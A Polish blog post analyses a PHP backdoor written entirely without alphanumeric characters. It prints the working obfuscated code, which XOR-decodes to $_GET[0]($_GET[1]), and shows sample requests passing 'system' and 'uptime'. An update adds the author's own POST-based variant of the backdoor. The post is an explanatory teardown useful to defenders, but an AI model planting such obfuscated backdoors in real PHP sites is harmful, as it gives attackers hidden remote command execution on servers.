Backdoor napisany w PHP bez użycia znaków alfanumerycznych (edit: 02.11.2015)

Chłopaki z Securi zamieścili ostatnio ciekawy wpis [1] zawierający informację o backdoorze napisanym w PHP pozwalającym na wywołanie dowolnej funkcji wraz z dowolnymi parametrami za sprawą wartości przekazanych GET’em. Niby nic ciekawego, a jednak. Ów backdoor został zapisany bez użycia jakichkolwiek znaków alfanumerycznych.

@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Żeby lepiej się czytało dodajmy kilka ‚enterów’.

@$_[]=@!+_;
$__=@${_}>>$_;
$_[]=$__;
$_[]=@_;
$_[((++$__)+($__++ ))].=$_;
$_[]=++$__;
$_[]=$_[--$__][$__>>$__];
$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$
$_[$__+ $__] ;
$_[@-_]($_[@!+_] );

Od razu lepiej, można by skończyć wpis na tym ;D, ale ok spróbujmy to przeanalizować krok po kroku.

 1. Backdoor zaczyna się linijką:
  @$_[]=@!+_;

  Jest to inicjalizacja tablicy. PHP będzie starało się sparsować podkreślnik jako stałą, jednak gdy nie będzie mógł takiej stałej znaleźć zwróci odpowiednie ostrzeżenie. Przypomnijmy, że umieszczenie ‚@’ przed wyrażeniem spowoduje wyłączenie informacji o wszystkich błędach i ostrzeżeniach dotyczących danego wyrażenia [2]. Nieznaleziona stała zostaje następnie rzutowana przez parser na ciąg znaków: string(1) ‚_’ i ten poprzez użycia operatora ‚+’ zostaje rzutowany na integer: int(0). Na koniec użycie negacji binarnej (znak ‚!’) powoduje rzutowanie wyżej wspomnianego zera na logiczną jedynkę, czyli TRUE. W efekcie pierwsza linia kodu daje nam tablicę z jednym elementem: array(true). Zdebugujmy to:

  $_[] = !+_;
  var_dump($_);
  
  //out:
  array(1) { [0]=> bool(true) }
  

  Ufff…. lecimy dalej ;>

 2. Kolejne linie kodu:
  $__=@${_}>>$_;
  $_[]=$__;
  $_[]=@_;
  

  Moim zdaniem nawiasy klamrowe są zbędne (ale mogę się mylić). Dzięki bitowemu przesunięciu do zmiennej $__ ląduje wartość int(0). Ponieważ 1 >> 1 daje zero. (Jak działa przesunięcie bitowe odsyłam do [3]). Następnie w/w zero jest dodawane na końcu tablicy. W kolejnej linijce na koniec tablicy dodany jest znak ‚_’ (skąd się to wzięło pisałem w pkt 1.). Aktualnie nasza tablica $_ wygląda następująco:

  var_dump($_);
  
  //out:
  array(3) { [0]=> bool(true) [1]=> int(0) [2]=> string(1) "_" }
  
 3. Next:
  $_[((++$__)+($__++ ))].=$_;
  $_[]=++$__;
  

  Aktualnie zmienna $__ ma wartość int(0). Teraz ważna jest kolejność wykonywanych operacji. Preinkrementacja najpierw zwiększa jej wartość na 1 i dopiero ją zwraca. Następnie mamy postinkrementację, która najpierw zwraca wartość 1 a później ją zwiększa o 1 (inkrementuje). Czyli w nawiasach kwadratowych otrzymujemy 1+1 a finalnie $__ ma wartość int(2). Druga sprawa w php jeśli rzutujemy tablicę na string otrzymamy string(5): „Array” i ta wartość doklejana jest do wcześniejszej wartości znajdującej się pod indeksem 2 czyli do ‚_’. Tłumacząc to mamy

  $_[2].="Array";

  Kolejna linijka to znowu preinkrementacja czyli na końcu naszej dotychczasowej tablicy umieszczana jest wartość: int(3). Sprawdźmy:

  var_dump($_);
  
  //out:
  array(4) { [0]=> bool(true) [1]=> int(0) [2]=> string(6) "_Array" [3]=> int(3) }
  
 4. Na początek przypomnijmy jaką wartość ma zmienna $__:
  var_dump($__);
  
  //out:
  int(3)
  

  Tym razem pod młot idzie kod:

  $_[]=$_[--$__][$__>>$__];

  Najpierw predekrementacja czyli $__ ma wartość int(2) i taki będzie pierwszy indeks. Następnie mamy przesunięcie bitowe 2 >> 2. Czyli jak spojrzymy na reprezentację dwójki binarnie: 00000010 widzimy, że jedynka wylatuje w kosmos (brak rotacji). Odwołując się więc do $_[2][0] zostaje zwrócony znak ‚_’  i zostaje on umieszczony na końcu tablicy (przypominam, że w php łańcuchy znakowe podobnie jak w C można potraktować po prostu jak tablice znaków). Check:

  var_dump($_);
  
  //out:
  array(5) { [0]=> bool(true) [1]=> int(0) [2]=> string(6) "_Array" [3]=> int(3) [4]=> string(1) "_" }
  
 5. Teraz robi się średnio ciekawie…
  $_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
  $_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
  $_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
  $_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
  

  ale po kolei… Po operacjach z poprzedniego punktu $__ przyjęło wartość int(2). Podstawmy więc znane wartości do powyższego kodu:

  $_[2].=((2+2)+ $_[2-2]).(2+2+2)+$_[2-2];
  $_[2+2] =($_[2][2>>2]).($_[2][2]^$_[2][(2<<2)-2] );
  $_[2+2] .=($_[2][(2<<2)-(2/2)])^($_[2][2] );
  $_[2+2] .=($_[2][2+2])^$_[2][(2<<2)-2 ];
  

  Ok, czyli najpierw do wartości znajdującej się pod indeksem 2 doklejana jest wartość:

  $_[2].=((4)+ $_[0]).(6)+$_[0];
  
  //czyli
  $_[2].="57"
  

  W efekcie pod indeksem 2 mamy wartość string(8) „_Array57”. Next…

  $_[2+2] =($_[2][2>>2]).($_[2][2]^$_[2][(2<<2)-2] );
  $_[2+2] .=($_[2][(2<<2)-(2/2)])^($_[2][2] );
  $_[2+2] .=($_[2][2+2])^$_[2][(2<<2)-2 ];
  
  // najpierw ustawiana jest wartość pod indeksem 4,
  // a następnie są do niej doklejane kolejne ciągi znaków
  $_[4] =($_[2][0]).($_[2][2]^$_[2][(8)-2] );
  $_[4] .=($_[2][(8)-(1)])^($_[2][2] );
  $_[4] .=($_[2][4])^$_[2][(8)-2 ];
  // czyli
  $_[4] ='_'.('r'^'5');
  $_[4] .='7'^'r';
  $_[4] .='a'^'5';
  

  Wyniki xor’owania:

  'r'^'5' => string(1) "G"
  '7'^'r'=> string(1) "E"
  'a'^'5'=> string(1) "T"
  

  Ok czyli $_[4] ma w tej chwili wartość string(4) „_GET”. Sprawdźmy:

  var_dump($_);
  
  //out:
  array(5) { [0]=> bool(true) [1]=> int(0) [2]=> string(8) "_Array57" [3]=> int(3) [4]=> string(4) "_GET" }
  
 6. Na koniec deser:
  $_=$
  $_[$__+ $__] ;
  $_[@-_]($_[@!+_] );
  

  Pierwsza i druga linijkę możemy złożyć razem ponieważ nie ma średnika otrzymujemy wówczas $_=$$_[$__+ $__], czyli operator odwołujący się do zmiennej na podstawie stringa (w tym wypadku „_GET”). Po takim zaklęciu pod zmienną $_ zostaje podstawiona wszystkim dobrze znana zmienna $_GET. Ostatnia operacja to już tylko formalność:

  $_GET[0]($_GET[1]);

  Czyli można powiedzieć klasyczny backdoor jakiego każdy by zauważył i rozpoznał 😉 (i po co tyle krzyku…?). Sprawdźmy jak zadziała:

  Fatal error: Function name must be a string on line 13
  
  // musimy przekazać GET'em nazwę funkcji
  // http://example.com/backdoor.php?0=system
  PHP Warning:  system(): Cannot execute a blank command in /shell.php on line 13
  
  // potrzebny jeszcze parametr dla funkcji system
  // http://example.com/backdoor.php?0=system&1=uptime
  08:31:55 up 2 days, 10:05,  1 user,  load average: 0.13, 0.09, 0.08
  

I to by było na tyle 😉

Aktualizacja (20151102) {

Dodałem drobną modyfikację do oryginalnego kodu. W ten sposób powstała wersja backdoora, która działa niemal identycznie, jedyna różnica jest taka, że parametry do backdoora przekazujemy metodą POST:

@$_[]=@!+_;$__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__;$_[]=$_[--$__][$__>>$__];$_[$__].=($_[$__-$__]).(($__+$__)+ $_[$__-$__]).($__+$__+$__).($__);
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__+$__]^$_[$__][($__<<$__)-$__]);
$_[$__+$__].=($_[$__][$__+$__+$_[$__^$__]])^$_[$__][($__<<$__)];
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)+$_[$__^$__]];
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$_[$__^$__]];
$_=$
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

} //EOA(20151102)

Linki:

 1. http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
 2. http://writecodeonline.com/php/
 3. http://pl.wikipedia.org/wiki/Operacje_bitowe
 4. http://www.php.net/manual/en/language.variables.variable.php
Reklamy
Otagowane , , , ,

Skomentuj

Wprowadź swoje dane lub kliknij jedną z tych ikon, aby się zalogować:

Logo WordPress.com

Komentujesz korzystając z konta WordPress.com. Wyloguj /  Zmień )

Zdjęcie na Google+

Komentujesz korzystając z konta Google+. Wyloguj /  Zmień )

Zdjęcie z Twittera

Komentujesz korzystając z konta Twitter. Wyloguj /  Zmień )

Zdjęcie na Facebooku

Komentujesz korzystając z konta Facebook. Wyloguj /  Zmień )

w

Connecting to %s

%d blogerów lubi to: